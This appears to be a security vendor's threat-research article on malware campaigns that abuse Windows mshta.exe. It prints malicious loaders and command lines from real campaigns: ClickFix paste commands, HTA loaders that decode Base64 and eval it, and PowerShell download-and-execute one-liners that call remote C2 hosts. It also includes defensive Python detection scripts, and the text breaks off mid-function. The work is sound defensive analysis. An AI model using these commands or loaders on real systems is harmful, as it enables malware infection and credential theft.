Microsoft’s MSHTA Legacy Tool Still Powers Malware Campaigns on Windows

Janos Gergo SZELES

May 19, 2026

Bitdefender security researchers have found that attackers continue to abuse Microsoft HTML Application Host (MSHTA), a legacy utility present by default on Windows systems that can execute VBScript and JavaScript from local or remote files.

Cybercriminals abuse legitimate, albeit legacy, tools to push a host of malware, ranging from run-of-the-mill password stealers to advanced threats. Bitdefender’s previous investigations already revealed how attackers used LOTL tactics in a Windows and macOS malware campaign that leveraged fake “Claude Code” Google ads.

“ClickFix” attacks were also used with a new LummaStealer and CastleLoader campaign, not to mention the malware used to infect the devices of people who downloaded pirated versions of Leonardo DiCaprio’s new film, One Battle After Another.

Key findings

  • MSHTA remains a widely abused Living-off-the-Land binary (LOLBIN) despite being a legacy utility.
  • Attackers use it across multiple malware categories, from commodity stealers to advanced threats.
  • Campaigns frequently rely on multi-stage, fileless execution chains involving PowerShell and HTA scripts.
  • Social engineering plays a critical role, including fake software downloads and ClickFix-style lures.
  • Effective defense requires both user awareness and layered technical controls.

Microsoft announced the deprecation of VBScript in 2023. Since the second half of 2024 it has shipped as a Feature on Demand that is still enabled by default; around 2027 it is to be disabled by default, and Microsoft plans to remove it from Windows entirely after that.

We analyzed how attackers continue to abuse MSHTA, another legacy utility that remains available by default on Windows systems and can execute VBScript and JavaScript from local or remote files.

In recent months, we noticed an increase in detections of mshta.exe in the execution chain, indicating that it remains a relevant Living-off-the-Land binary even after standalone Internet Explorer was retired.

The activity we analyzed spans multiple malware categories.

At the lower end, MSHTA is heavily used in delivery chains for commodity stealers such as LummaStealer and Amatera, as well as loaders such as CountLoader and Emmenhtal Loader.

At the same time, it also shows up in more advanced and persistent malware campaigns, including ClipBanker and PurpleFox. This range of abuse highlights why MSHTA continues to matter to defenders: it’s not a single malware family or intrusion model. It remains useful across the spectrum from opportunistic malware delivery to long-lived compromise.

During this investigation, we also identified recently introduced domain patterns for an HTA-based loader called CountLoader that delivers commodity malware.

Introduction

Although Internet Explorer reached end of support on June 15, 2022, Microsoft Edge still includes an IE mode to ensure backward compatibility, with support promised at least until 2029 [2].

This reveals a broader security problem: even after companies retire legacy products, parts of their ecosystem can persist in Windows for years, supporting older workflows and enterprise compatibility requirements.

Threat actors frequently abuse trusted, preinstalled Windows binaries to execute malicious content, relying on software that is already present on the system instead of bringing their own.

These binaries, commonly referred to as Living-off-the-Land binaries (LOLBINs), are valuable because they help attackers reduce the need to drop custom tools, blend into legitimate system activity, and make malicious chains harder to distinguish from benign administrative activity.

Mshta.exe is one of these utilities. It was originally shipped with Internet Explorer and runs HTML Applications (HTA) using the Internet Explorer rendering engine (mshtml.dll).

HTA files can embed JavaScript and VBScript code, allowing script execution in the context of a trusted, signed process. Legacy components that many users consider obsolete can still serve as a convenient execution path for modern malware.

There is currently no public indication that this utility will also be removed from future versions of Windows. As long as it remains available by default, MSHTA remains relevant both as a residual administrative tool and as part of the exposed attack surface.

Legitimate use

Although MSHTA is a legacy utility with more modern alternatives that offer similar capabilities, some system administrators and software developers still use it to alert users to updates or to display simple web applications without opening a browser.

Around 10% of our MSHTA telemetry still consists of simple one-liner scripts that notify users about administrative tasks via javascript:alert() or vbscript:msgbox().

Another small portion of our MSHTA telemetry comes from seemingly legitimate login scripts executed through MSHTA one-liners that create a WScript.Shell object and run a local file in its context.

This remaining legitimate usage is important because it shows that MSHTA has not disappeared completely from real-world environments.

At the same time, these use cases are steadily becoming less common, and there are far more modern and legitimate ways to automate system administration tasks.

We recommend moving administrative workflows off MSHTA wherever possible. Every legitimate use that remains in an environment is also a reason its defenders cannot simply block the binary, so retiring those scripts directly shrinks the attack surface.

MSHTA as a LOLBIN

LOLBINs (Living-off-the-Land binaries) are attractive to attackers because they are signed, familiar, and often implicitly trusted within enterprise environments. When abused, they can help adversaries execute code, retrieve remote payloads, and progress an intrusion without immediately relying on obviously malicious binaries.

MSHTA still fits this model well [10]. It is present by default on Windows systems, can execute script content in-memory, and can retrieve content from remote locations. These properties make it useful for stagers and loaders, allowing attackers to minimize on-disk artifacts and take advantage of a legitimate Microsoft-signed process during execution.

Since the start of the year, we have observed an increase in MSHTA-related activity. Given that legitimate use of this utility is gradually fading, this trend likely reflects a rise in malicious activity rather than renewed administrative adoption.

In the following sections, we’ll reveal the most prominent campaigns from our insights and show how threat actors continue to adapt MSHTA-based attacks to deliver commodity malware at scale.

Campaigns employing MSHTA

The MSHTA activity we analyzed spans multiple types of malware, including commodity information stealers such as LummaStealer and Amatera, multi-stage loaders such as CountLoader and Emmenhtal Loader, clipboard hijackers such as ClipBanker, and more persistent threats such as PurpleFox.

Across these campaigns, MSHTA serves a similar purpose: it provides attackers with a built-in, Microsoft-signed utility that can retrieve and execute remote script content during the initial or intermediate stages of an infection chain.

This makes MSHTA especially useful for malware delivery. In some cases, it is used to launch HTA-based loaders directly from attacker-controlled infrastructure. In others, it is embedded into broader chains involving phishing, fake software installers, ClickFix-style lures or scripted downloaders.

Our telemetry shows that MSHTA most commonly appeared in campaigns that delivered stealers and loaders. This is significant because these malware families are often used to gain an initial foothold, steal credentials and browser-stored data, hijack sessions, and deliver additional payloads that can deepen the compromise.

This means that what may begin as the execution of a seemingly innocuous legacy Windows utility can quickly lead to account theft, financial fraud, data loss, or broader infection of the affected system.

This pattern is consistent with MSHTA’s role as a lightweight execution and staging mechanism. It is well-suited for retrieving obfuscated HTA content, launching in-memory scripts, and handing off execution to PowerShell, WScript, msiexec, or a final malware payload.

LummaStealer and Amatera via CountLoader

One of the most prominent MSHTA-related clusters in our telemetry involved CountLoader, an HTA-based loader used to deliver commodity malware, most notably the information stealers LummaStealer and Amatera.

These threats are relevant to users because their primary goal is to steal sensitive data, including credentials, browser-stored information, session tokens, and cryptocurrency-related data. In this delivery chain, MSHTA plays an important role as a lightweight execution mechanism that retrieves and launches the next-stage HTA payload from remote infrastructure.

The vast majority of mshta.exe detections come from command lines containing domains whose names imitate legitimate services but that are registered under the .cc TLD (e.g., google-services[.]cc, memory-scanner[.]cc).

This campaign began to gain traction toward the end of 2025, peaked at the end of January 2026, and has since declined gradually as attackers shifted to other platforms to host the payloads.

On VirusTotal these domains are usually labeled as LummaStealer infrastructure, because Lumma is the most common final payload of this chain and the same domains also appear in Lumma-related configurations.

However, the loader appears to be distinct and can be correlated with existing reports of CountLoader [5], [6]. We also observed the same loader chain delivering Amatera, another commodity information stealer.

The lures used in this campaign are similar to those employed by CastleLoader [7].

Victims are enticed through messages, social media posts, or SEO-poisoned websites that promise free or cracked software. The downloaded archive may include the password directly in its filename or contain a document indicating the password to use.

Archive content with Python interpreter disguised as setup

The victim executes a Setup.exe file, which is in fact a legitimate Python interpreter. Alongside Setup.exe, the archive contains one or more python3<X>.dll files that the interpreter automatically loads.

These are legitimate Python core DLLs. The interpreter locates its standard library relative to its own executable, so the attacker-supplied .\Lib directory is what gets used for module loading, and the encodings package inside it is imported automatically during interpreter start-up, before any user script runs. In the analyzed sample, the malicious Python script resided in .\Lib\encodings\aliases.py and was launched from the package's __init__.py, so simply running Setup.exe was enough to start the chain.

The same directory also contains a renamed MSHTA executable, iso2022.exe. The malicious aliases.py script launches this binary to contact the C2 infrastructure and retrieve the HTA loader.

To construct the malicious URLs, the Python code defines individual characters as global variables and combines them through formatted strings before finally invoking os.system(cmd) to execute the resulting command line.

# Excerpt from the obfuscated aliases.py. The single-character globals it
# formats ({ctype}, {typeB}, {typeE}, ...) are defined earlier in the file and
# are omitted here; the command line they produce is shown below the excerpt.
### Regions

global_region = f'{ctype}d Lib{typeB}encodings'
local_format = f'{ptype}{typeE}org{typeA}wp{typeD}{atype}{typeA}{gtype}{typeA}stats{typeE}{ltype}'
en_UK = f'{htype}{ttype}{ttype}p{stype}{typeC}{typeB}{typeB}'
en_US = f'{typeE}{ctype}{ctype}'
en_ES = f'iso2022{typeE}e{xtype}e'

### Protection
mem_protect = f'{global_region} {typeH}{typeH} {en_ES} {en_UK}{local_format}'
ram_protect = f'alpha{typeD}centavr{typeE}{ctype}{ctype}'
rem_protect = f'{ctype}{mtype}d {typeA}{ctype} {stype}{ttype}ar{ttype} {typeA}b \"\" {ctype}{mtype}d {typeA}{ctype} '

### Probes
positive_probe = f'{mem_protect} {typeH} {en_ES} {en_UK}{ram_protect}'
negative_probe = f'{rem_protect}'

cmd = f'{positive_probe}'
os.system(cmd)

The resulting command line is shown below. Note the backslashes in https:\\ after the scheme: the chain works as written, so a detection pattern anchored on a literal :// will miss this form.

cd Lib\encodings && iso2022.exe https:\\planetitude[.]org/wp-admin/chellenge/stats.location & iso2022[.]exe https:\\alpha-centavr[.]cc

The HTA decodes the next payload from an array of character codes and launches it. The variable names seem to be generated from a dictionary of technical terms, and they vary from file to file.

CountLoader payload decode function
CountLoader killchain

Starting in late February 2026, we observed a new CountLoader domain-hosting pattern. The naming convention remained similar, using domains that imitate legitimate service names, but the infrastructure shifted to .vg and .gl TLDs.

Examples include explorer[.]vg, ccleaner[.]gl, and microservice[.]gl. The HTA scripts embedded at these locations follow the same obfuscation pattern observed in the earlier .cc-based infrastructure.

MSHTA with .vg or .gl domains

Emmenhtal Loader

Another prominent MSHTA-based infection chain we observed involved Emmenhtal Loader [3], a multi-stage loader used to deliver commodity malware, including information stealers such as LummaStealer. In this campaign, MSHTA serves as an early-stage execution mechanism that retrieves and launches a remote HTA payload, which then unfolds through multiple script-based stages.

The infection chain begins with phishing messages on Discord that contain links to pages designed to hijack the clipboard and trick the user into executing a malicious command line as part of a fake human-verification process.

These pages resemble legitimate reCAPTCHA systems, but are hosted on suspicious websites (e.g. humancheck[.]shop/pass-this-step-to-continue[.]html) and include JavaScript code that copies a malicious command line to the clipboard when the user accesses the page.

The user is then lured into pressing Win + R to open the Run dialog, followed by Ctrl + V and Enter to paste and execute the command. As a result, explorer.exe, the process behind the Run dialog, appears to legitimately launch mshta.exe with a command line such as the following; the text after the URL only serves to make the pasted command look like a verification string:

mshta[.]exe hxxps[://]buck2nd[.]oss-eu-central-1[.]aliyuncs[.]com/dir/sixth/singl6[.]mp4 #  ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165

Although these websites are often taken down quickly by their hosting providers, some server responses remain available on VirusTotal and can still be analyzed.

The file hosted on the server is a valid HTA, but it is intentionally bloated with large amounts of garbage data that are ignored during execution. Embedded within this content are a few valid HTML blocks that contain the malicious script. The file is never written to disk; instead, it is executed directly in memory by mshta.exe.

The HTML structure is spread across the file, inserted between unusable data that is ignored. First, it sets the MSHTA window to 1x1 pixels, starts it minimized, and hides it from the taskbar to evade detection.

Next, the HTML body invokes the script entry point.

The script block contains a minimal JavaScript loader that implements a Base64 decoding function and includes a large Base64-encoded string as a variable. The main function decodes and executes the embedded script.

<script>
function HbQIdLwSSIRvbVXZWLOwjRQqttuGTqKP(b64) {
    var VonICsfLpEqDZndPtRRVmRdurFjpCMUv="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    var pad=0;
    if(b64.length>=2 && b64.substr(b64.length-2)==="=="){pad=2;b64=b64.substr(0,b64.length-2);}
    else if(b64.length>=1 && b64.substr(b64.length-1)==="="){pad=1;b64=b64.substr(0,b64.length-1);}
    var out=[];
    var i=0;
    while(i<b64.length){
        var e1=VonICsfLpEqDZndPtRRVmRdurFjpCMUv.indexOf(b64.charAt(i++));
        var e2=VonICsfLpEqDZndPtRRVmRdurFjpCMUv.indexOf(b64.charAt(i++));
        var e3=VonICsfLpEqDZndPtRRVmRdurFjpCMUv.indexOf(b64.charAt(i++));
        var e4=VonICsfLpEqDZndPtRRVmRdurFjpCMUv.indexOf(b64.charAt(i++));

        var c1=(e1<<2)|(e2>>4);
        var c2=((e2&15)<<4)|(e3>>2);
        var c3=((e3&3)<<6)|e4;
        out.push(c1&0xFF);
        if(e3!==64&&e3!==-1) out.push(c2&0xFF);
        if(e4!==64&&e4!==-1) out.push(c3&0xFF);
    }
    if(pad>0) out.splice(out.length-pad,pad);

    var rECeQYjgakLNnbZcTJmkoefcDPJScPAz="";
    for(var x=0;x<out.length;x++){
        rECeQYjgakLNnbZcTJmkoefcDPJScPAz+=String.fromCharCode(out[x]);
    }
    return rECeQYjgakLNnbZcTJmkoefcDPJScPAz;
}

var rDiPjSLADFoHqVucyLWWZenMlZdunYAi = <B64_script_redacted_for_size>;

function ZGnRfrBcHrSGXLgAhCCMsyQTuwRQHDQT() {
    var cxabulitGWnsgaALcqJZHzjkKyjdyyyo = HbQIdLwSSIRvbVXZWLOwjRQqttuGTqKP(rDiPjSLADFoHqVucyLWWZenMlZdunYAi);
    eval(cxabulitGWnsgaALcqJZHzjkKyjdyyyo);
}
</script>

The decoded result is a second-stage loader that includes the same Base64 routine and two decryption functions. The apparent size of this script is misleading, as it includes hundreds of lines of small helper functions that are never actually called.

Its purpose is to decrypt a string stored in a global variable, create a WScript.Shell object and run the decrypted command through it, still within the process chain started by mshta.exe.

var cDhmBQsxdNEUHhzpdeyyybZMzVNANXtp = <redacted_encrypted_payload>
var LevylKBNaEDCESWQQeQznakYNfOEICxk = <redacted_decryption_key>
var VFjTZSncvgnebyEyMwfLTieiopsaYfQZ = <redacted_b64_string>

function initMain() {
    var stg1 = from_base64(VFjTZSncvgnebyEyMwfLTieiopsaYfQZ);
    var stg2 = VQGTmVqlpKoSesHrvqRZECwHNdrdrDRX(stg1, LevylKBNaEDCESWQQeQznakYNfOEICxk);
    var EYgUwBZqUyrgJIRdiVDwqyUHlgusmKOr = xor_decrypt(stg2, cDhmBQsxdNEUHhzpdeyyybZMzVNANXtp);
    var decoded_payload_script = "";
    for(var i=0; i<EYgUwBZqUyrgJIRdiVDwqyUHlgusmKOr.length; i++) {
        decoded_payload_script += String.fromCharCode(EYgUwBZqUyrgJIRdiVDwqyUHlgusmKOr[i]);
    }

    try {
        var sh = spawn_wscript_shell();
        sh.Run(decoded_payload_script, 0, false);
    } catch(e) {}

    window.close();
}

initMain();

The resulting command line is a one-liner that downloads a PowerShell script from a remote location and executes it in memory without saving it to disk.

Start-Process "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell[.]exe" -ArgumentList "-w hidden -ep bypass -nop -Command `"iex ((New-Object System[.]Net[.]WebClient).DownloadString('hxxps[://]klipdiheqoe[.]shop/ruwkl[.]png'))`"" -WindowStyle Hidden

The downloaded PowerShell script is heavily obfuscated and impractical to reverse by hand. PowerShell script block logging (event 4104 in the Microsoft-Windows-PowerShell/Operational log), however, records every script block as it is compiled, including layers that only ever exist in memory, so with some tooling the final layer that actually executed can be reconstructed from the logs.

The final, deobfuscated version of the PowerShell script consists of two parts. The first one is an AMSI bypass by patching clr.dll, possibly taken from a publicly available GitHub repository [4]. After the AMSI bypass, there is a big Base64-encoded string, followed by three lines of code that decode the Base64 and load the resulting byte array as an assembly.

$bytes = [System.Convert]::FromBase64String($a);
[Reflection.Assembly]$assembly = [System.AppDomain]::CurrentDomain.Load($bytes) # Load Assembly
$assembly.EntryPoint.Invoke($null, @())

This loader is most often used to execute commodity malware on the infected system. In the case we analyzed, the assembly that was executed is a well-known LummaStealer assembly (1E0E375F3EE82D5AF5DFE6F7DF0E2FAC9A7D37C67ADD3390D05A93AFD85B7C84) that contains C2 domains associated with the Lumma infrastructure.
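
The recovery step described above depends on script block logging, and long blocks arrive split across several events. The Python below is an added example, not Bitdefender's tooling: it reassembles Microsoft-Windows-PowerShell/Operational event 4104 records by ScriptBlockId and MessageNumber, refuses to act on blocks with a missing part, then looks for the FromBase64String / CurrentDomain.Load / EntryPoint.Invoke pattern shown above, decodes the embedded blob and hashes it so it can be checked against an IoC list such as the one at the end of this article. The records are constructed in the shape an evtx-to-JSON export gives them; the embedded "assembly" is a dummy MZ-prefixed blob, not a real payload.

```python
import base64
import hashlib
import re


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


# Hashes to compare recovered assemblies against; this one is the LummaStealer
# assembly from the IoC list at the end of the article.
KNOWN_BAD = {"1e0e375f3ee82d5af5dfe6f7df0e2fac9a7d37c67add3390d05a93afd85b7c84"}

# Constructed 4104 records in evtx-to-JSON shape. The "assembly" is a dummy
# MZ-prefixed blob, not a real payload; the script text mirrors the final stage above.
ASSEMBLY = b"MZ" + bytes(range(256)) * 4
FINAL_STAGE = (
    "$a = '" + base64.b64encode(ASSEMBLY).decode() + "'\n"
    "$bytes = [System.Convert]::FromBase64String($a);\n"
    "[Reflection.Assembly]$assembly = [System.AppDomain]::CurrentDomain.Load($bytes)\n"
    "$assembly.EntryPoint.Invoke($null, @())\n"
)


def make_4104(sbid, text, path="", size=700):
    """One record per part, the way PowerShell splits a long script block across events."""
    parts = [text[i:i + size] for i in range(0, len(text), size)]
    return [{"EventID": 4104, "ScriptBlockId": sbid, "MessageNumber": n + 1,
             "MessageTotal": len(parts), "ScriptBlockText": p, "Path": path}
            for n, p in enumerate(parts)]


EVENTS = (
    make_4104("c0ffee00-0000-4000-8000-000000000002",
              "Get-CimInstance Win32_OperatingSystem | Select-Object Caption", path=r"C:\ops\inventory.ps1")
    + make_4104("c0ffee00-0000-4000-8000-000000000001", FINAL_STAGE)[::-1]   # parts logged out of order
    + make_4104("c0ffee00-0000-4000-8000-000000000003", "#" * 1500)[1:]      # first part lost (log rolled over)
)


def reassemble(events):
    """Group 4104 records by ScriptBlockId and stitch the parts in MessageNumber order."""
    groups = {}
    for ev in events:
        if ev.get("EventID") == 4104:
            groups.setdefault(ev["ScriptBlockId"], []).append(ev)
    blocks, incomplete = {}, []
    for sbid, parts in groups.items():
        parts.sort(key=lambda e: e["MessageNumber"])
        if [p["MessageNumber"] for p in parts] != list(range(1, parts[0]["MessageTotal"] + 1)):
            incomplete.append(sbid)   # never trust a partial block: the decoder may sit in the missing part
            continue
        blocks[sbid] = {"path": parts[0]["Path"],
                        "text": "".join(p["ScriptBlockText"] for p in parts)}
    return blocks, incomplete


# Base64 -> byte[] -> Assembly.Load(...) as in the final stage above.
REFLECTIVE_LOAD = re.compile(
    r"FromBase64String\s*\(.*?\)[\s\S]*?"
    r"(?:CurrentDomain\.Load|\[(?:System\.)?Reflection\.Assembly\]::Load)\s*\(", re.I)
B64_BLOB = re.compile(r"'([A-Za-z0-9+/]{64,}={0,2})'")


def find_reflective_loads(blocks):
    """For each block matching the pattern, decode its Base64 blobs and hash them."""
    hits = []
    for sbid, blk in blocks.items():
        if not REFLECTIVE_LOAD.search(blk["text"]):
            continue
        for blob in B64_BLOB.findall(blk["text"]):
            raw = base64.b64decode(blob)
            digest = sha256_hex(raw)
            hits.append({"script_block_id": sbid, "path": blk["path"] or "(in memory)",
                         "is_pe": raw[:2] == b"MZ", "size": len(raw),
                         "sha256": digest, "known": digest in KNOWN_BAD})
    return hits


if __name__ == "__main__":
    blocks, incomplete = reassemble(EVENTS)
    print(f"{len(blocks)} complete block(s), incomplete: {incomplete}")
    for h in find_reflective_loads(blocks):
        print(h)
```

The empty Path field is itself a signal: a script block with no path was never a file on disk, which is exactly the in-memory stage the AMSI bypass is meant to protect. Hashing the decoded blob rather than the script text is what makes the result comparable across campaigns, since the surrounding PowerShell changes with every obfuscation run while the assembly does not.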

ClipBanker

Another MSHTA-driven cluster in our telemetry involved ClipBanker [8], a malware family primarily designed to steal cryptocurrency by replacing wallet addresses in the victim’s clipboard. In this infection chain, MSHTA serves as an early-stage execution mechanism that launches a remote HTA and then quickly transitions to PowerShell-based persistence and payload delivery.

The HTA executed from the remote location hxxps[://]asd[.]s7610rir[.]pw/win/checking[.]hta is a simple VBScript that hides the MSHTA window by resizing it to zero and moving it to negative coordinates, creates a WScript.Shell object and runs a Base64-encoded PowerShell command:

<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
        Window.ReSizeTo 0, 0
        Window.moveTo -2000,-2000
        Function var_func()
                Dim var_shell
                Set var_shell = CreateObject("Wscript.Shell")
                var_shell.run "cmd /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -e <redacted_b64_command>", 0, true
        End Function

        var_func
</script>
<body>
</body>
</HEAD>
</HTML>

The command downloads the second stage from hxxp[://]185[.]208[.]159[.]199, a PowerShell script named checking.ps1 (333E2192F2551415659FB4094E81B911708921BB588EECF65E27F51C9938DFC2).

This script adds Windows Defender exclusions and sets up persistence through scheduled tasks, which run the ClipBanker downloader obtained from: hxxp[://]87[.]96[.]21[.]84/ichigo-lite[.]ps1 (38FE562136ADE372FC4CEDDE67826AEEA8404E93A54A4A4736DDB4C8C8D4C96D).

The scheduled task names masquerade as legitimate-sounding maintenance jobs (e.g., Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237).

Finally, a cleanup script gets executed, downloaded from hxxp[://]87[.]96[.]21[.]84/del[.]ps1 (7D0487AFC91B0FE8B2FBF732AB54C3C07E86BF69471BBA6C283AABEA190499BA).

This script cleans up the files used during the attack and terminates processes that might have been involved in dynamic analysis in a sandbox (e.g., Procmon, Autoruns).

PurpleFox - even sophisticated threats use MSHTA

MSHTA is not only used in commodity-stealing and loader campaigns. It also appears in delivery chains associated with PurpleFox [9], a more advanced and persistent malware family that has remained active for years.

This is important because it shows that MSHTA is useful not only for lightweight initial infection stages, but also for malware operations focused on stealth, persistence, and long-term control of the compromised system.

Since emerging in 2018, PurpleFox has continued to expand its arsenal and remains active in 2026. One of its long-standing delivery methods, however, has remained consistent: launching msiexec from an MSHTA command line in order to download and execute an MSI package disguised as a .png file.

The command lines are recognizable by the list of IP addresses they attempt to contact and by the .png file that is ultimately executed through msiexec:

mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (195[.]189[.]28[.]244:17807 103[.]124[.]106[.]194:18413 58[.]221[.]59[.]20:17256 ) do Msiexec /i http://%i/3EBCE3A4.Png /Q",0)(window.close)

Once installed, PurpleFox functions as a rootkit-enabled backdoor whose primary objectives are to remain hidden, establish persistence, and execute on-demand commands from its C2 infrastructure.

These capabilities can support a wide range of malicious activity, including information theft, surveillance, and disruptive actions such as DDoS attacks.

MSHTA and PowerShell - an intermediary step in multi-stage attacks

Our telemetry shows multiple smaller clusters of PowerShell executions via MSHTA, where MSHTA creates a wscript shell that runs the PowerShell process to execute the loader responsible for downloading the next stage.

We observed obfuscation techniques unique to each campaign, aiming to mask keywords that trigger alerts in EDRs and SIEMs.

The first category features URLs that appear to point to image files but actually return a PowerShell script that is downloaded and executed in memory. The IPs involved are typically associated with XWorm and DanaBot. The PowerShell keywords are split into string fragments that are joined only at run time, and IEX is written with backtick escapes (I`E`X), so no contiguous keyword appears on the command line.

mshta.exe" vbscript:close(CreateObject("WScript.Shell").Run("powershell $L='(New-Object Net.We';$Y='bClient).Downlo';$V='adString(''http://92[.]255[.]57[.]155/b.jpg'')';$F=I`E`X ($L,$Y,$V -Join '')|I`E`X",0))

A variation of the XWorm command line pads the download string with junk characters, which String.Replace strips at run time before the result is passed to IEX.

mshta.exe" vbscript:close(CreateObject("WScript.Shell").Run("powershell IEX(('#!!i!Qw#Q!r #8###5#.!!!2###0!!8#.8###4!!.2!!!0###8!/#x!!!.j###pg# |#i!!e!!!!x#').RePlACE('Q','').REplAcE('!','').rEpLAce('#',''))",0))

The next category involves the Lalala information stealer. Here the server returns the script only if the POST request to the PHP gate carries a predefined password in its body, so a crawler or sandbox that fetches the URL without it receives nothing. The other PowerShell keywords remain unobfuscated.

mshta.EXE" vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell Invoke-Expression -Command:(iwr -uri 185[.]156[.]172[.]22/gate990.php -method post -body gieM3iR5).content"", 0 : window.close")

Another cluster of PowerShell commands executes scripts that were downloaded earlier in the chain. This variant is noisier: the script exists on disk, where it can be scanned and recovered.

mshta.EXE" vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\U_f8d33485bec26b2b1969f910c131f027\AppData\Roaming\Adobe\peyneKzk2.ps1 """""" ,0:close")

The final major category involves command lines where the URL is encoded and stored in local variables. The one-liner decodes the URL and executes the downloaded payload in memory.

mshta.exe" vbscript:close(CreateObject("WScript.Shell").Run("powershell $Z='aXdyIGh0dHBzOi8vMHg0NC5pbmZvL2F8aWV4';$B=[System.Convert]::FromBase64String($Z);$D=[System.Text.Encoding]::UTF8.GetString($B);iex $D",0))
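
Taken together, the command lines in this section and in the campaign write-ups above form a small corpus to test detection logic against. The following Python script is an added example, not Bitdefender's tooling: it takes process-creation records in the shape Sysmon event 1 exposes them (Image, OriginalFileName, ParentImage, CommandLine), undoes the page's defanging, and statically evaluates the obfuscation tricks shown above (fragment joining with backtick escapes, Replace() junk removal, Base64 in both the quoted-literal and -EncodedCommand forms) before extracting the staging URL and a handful of behavioural signals. The sample records are constructed from the command lines quoted in this article; the -EncodedCommand sample (192.0.2.10) and the benign msgbox one-liner are invented, and the .cc/.vg/.gl check merely encodes the hosting pattern reported above, so treat it as a hint rather than a verdict.

```python
import base64
import re

# Process-creation records in the shape Sysmon event 1 reports them. They are
# constructed from the command lines quoted in this article (still defanged, as
# on the page); the -e sample (192.0.2.10) and the msgbox one-liner are invented.
MSHTA = r"C:\Windows\System32\mshta.exe"
ENC = base64.b64encode("iwr http://192.0.2.10/checking.ps1|iex".encode("utf-16-le")).decode()
EVENTS = [
    {"Image": MSHTA, "OriginalFileName": "MSHTA.EXE", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe hxxps[://]buck2nd[.]oss-eu-central-1[.]aliyuncs[.]com/dir/sixth/singl6[.]mp4 # I am not a robot"},
    {"Image": r"C:\Users\u\Downloads\Lib\encodings\iso2022.exe", "OriginalFileName": "MSHTA.EXE",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"iso2022.exe https:\\alpha-centavr[.]cc"},
    {"Image": MSHTA, "OriginalFileName": "MSHTA.EXE", "CommandLine":
     "mshta.exe vbscript:close(CreateObject(\"WScript.Shell\").Run(\"powershell $L='(New-Object Net.We';"
     "$Y='bClient).Downlo';$V='adString(''http://92[.]255[.]57[.]155/b.jpg'')';$F=I`E`X ($L,$Y,$V -Join '')|I`E`X\",0))"},
    {"Image": MSHTA, "OriginalFileName": "MSHTA.EXE", "CommandLine":
     "mshta.exe vbscript:close(CreateObject(\"WScript.Shell\").Run(\"powershell IEX(('#!!i!Qw#Q!r #8###5#.!!!2###0!!8#."
     "8###4!!.2!!!0###8!/#x!!!.j###pg# |#i!!e!!!!x#').RePlACE('Q','').REplAcE('!','').rEpLAce('#',''))\",0))"},
    {"Image": MSHTA, "OriginalFileName": "MSHTA.EXE", "CommandLine":
     "mshta.exe vbscript:close(CreateObject(\"WScript.Shell\").Run(\"powershell $Z='aXdyIGh0dHBzOi8vMHg0NC5pbmZvL2F8aWV4';"
     "$B=[System.Convert]::FromBase64String($Z);$D=[System.Text.Encoding]::UTF8.GetString($B);iex $D\",0))"},
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "OriginalFileName": "PowerShell.EXE",
     "ParentImage": MSHTA, "CommandLine": "powershell.exe -w 1 -NoProfile -ExecutionPolicy Bypass -e " + ENC},
    {"Image": MSHTA, "OriginalFileName": "MSHTA.EXE", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'mshta.exe vbscript:msgbox("Patch window tonight at 18:00",64,"IT notice")(window.close)'},
]


def refang(s):
    """Undo page-style defanging and the https:\\host spelling the CountLoader chain uses."""
    s = re.sub(r"hxxp", "http", s, flags=re.I).replace("[://]", "://").replace("[.]", ".")
    return re.sub(r"(https?):\\\\", r"\1://", s, flags=re.I)


VAR_FRAG = re.compile(r"\$\w+\s*=\s*'((?:[^']|'')*)'")


def join_split_tokens(s):
    """$L='(New-Object Net.We';$Y='bClient)...' -Join '' -> the string PowerShell rebuilds."""
    joined = "".join(f.replace("''", "'") for f in VAR_FRAG.findall(s))
    return s.replace("`", "") + " " + joined      # backtick is PowerShell's escape: I`E`X is IEX


REPL_CHAIN = re.compile(r"\(\s*'([^']*)'\s*\)((?:\.replace\('[^']*','[^']*'\))+)", re.I)
REPL_PAIR = re.compile(r"\.replace\('([^']*)','([^']*)'\)", re.I)


def apply_replace_chains(s):
    """('j#u#n#k').Replace('#','') -> 'junk': evaluate the chain statically."""
    def fold(m):
        text = m.group(1)
        for old, new in REPL_PAIR.findall(m.group(2)):
            text = text.replace(old, new)
        return "'" + text + "'"
    return REPL_CHAIN.sub(fold, s)


B64_LIT = re.compile(r"'([A-Za-z0-9+/]{16,}={0,2})'")
ENC_ARG = re.compile(r"\s-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_base64_layers(s):
    """Decode -EncodedCommand (UTF-16LE) and quoted Base64 literals that yield printable text."""
    layers = []
    m = ENC_ARG.search(s)
    if m:
        try:
            layers.append(base64.b64decode(m.group(1)).decode("utf-16-le", "replace"))
        except ValueError:
            pass
    for lit in B64_LIT.findall(s):
        try:
            text = base64.b64decode(lit, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            layers.append(text)
    return layers


URL = re.compile(r"https?://(?P<host>[a-z0-9.-]+)(?::\d+)?(?:/[^\s'\"()|,<>]*)?"
                 r"|(?<![\w.])(?P<ip>(?:\d{1,3}\.){3}\d{1,3})(?::\d+)?/[^\s'\"()|,<>]*", re.I)


def extract_urls(s):
    return [m.group(0) for m in URL.finditer(s)]


ARTICLE_TLDS = {"cc", "vg", "gl"}                       # CountLoader hosting pattern from the article; a hint only
MEDIA_EXT = (".mp4", ".mp3", ".png", ".jpg", ".gif")    # script served under a media or image name


def triage(ev):
    cmd = refang(ev["CommandLine"])
    layers = [cmd, join_split_tokens(cmd), apply_replace_chains(cmd)] + decode_base64_layers(cmd)
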